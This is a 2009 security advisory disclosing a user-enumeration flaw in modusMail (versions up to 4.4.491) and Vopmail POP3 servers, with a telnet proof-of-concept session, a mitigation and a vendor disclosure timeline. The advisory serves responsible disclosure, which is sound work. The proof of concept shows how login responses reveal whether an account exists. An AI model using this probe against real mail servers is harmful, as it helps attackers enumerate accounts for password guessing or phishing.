modusMail All in one email security solution
The modusMailâ„¢ mail server provides all-in-one email services, messaging security and spam protection. [ Taken from: http://www.vircom.com/en/products/modusmail/ ]
A conditional information disclosure exists in older versions of modusMail and Vopmail that will disclose whether an email account exists or not. The disclosure is conditional upon the presence of a @ or % character in the username. This is usually used when one mail system is responsible for the email of several domains. If the @ or % character was not present in the username the pop3 server would request a password before rejecting the login, as opposed to aborting the login attempt after receiving the user portion of the login.
- Discovered by: Eldar “Wireghoul” Marcussen
- Vendor: Vircom - http://www.vircom.com
- Affected versions:
- Modus mail <= 4.4.491
- Probably all versions of Vopmail
Proof of Concept
~$ telnet pop.vircom.com 110 Trying 220.127.116.11... Connected to gate.vircom.com. Escape character is '^]'. +OK modusMail POP3 Server 4.4.491.0 Ready <mailto:firstname.lastname@example.org> <email@example.com> user nosuchuserhere +OK nosuchuserhere is welcome here quit +OK vircom.com POP3 server signing off (mailbox empty) Connection closed by foreign host. ~$ telnet pop.vircom.com 110 Trying 18.104.22.168... Connected to gate.vircom.com. Escape character is '^]'. +OK modusMail POP3 Server 4.4.491.0 Ready <mailto:firstname.lastname@example.org> <email@example.com> user firstname.lastname@example.org -ERR email@example.com not known user nosuchuser%nosuchhost.com -ERR nosuchuser%nosuchhost.com not known quit +OK vircom.com POP3 server signing off (mailbox empty) Connection closed by foreign host.
Upgrade to a more recent version
Disclosure time line
- 06-Nov-2009 - Public disclosure
- 15-Sep-2006 - New version of modusMail mitigate this
- 20-Aug-2006 - Vendor acknowledge vulnerability
- 19-Aug-2006 - Vendor notified through email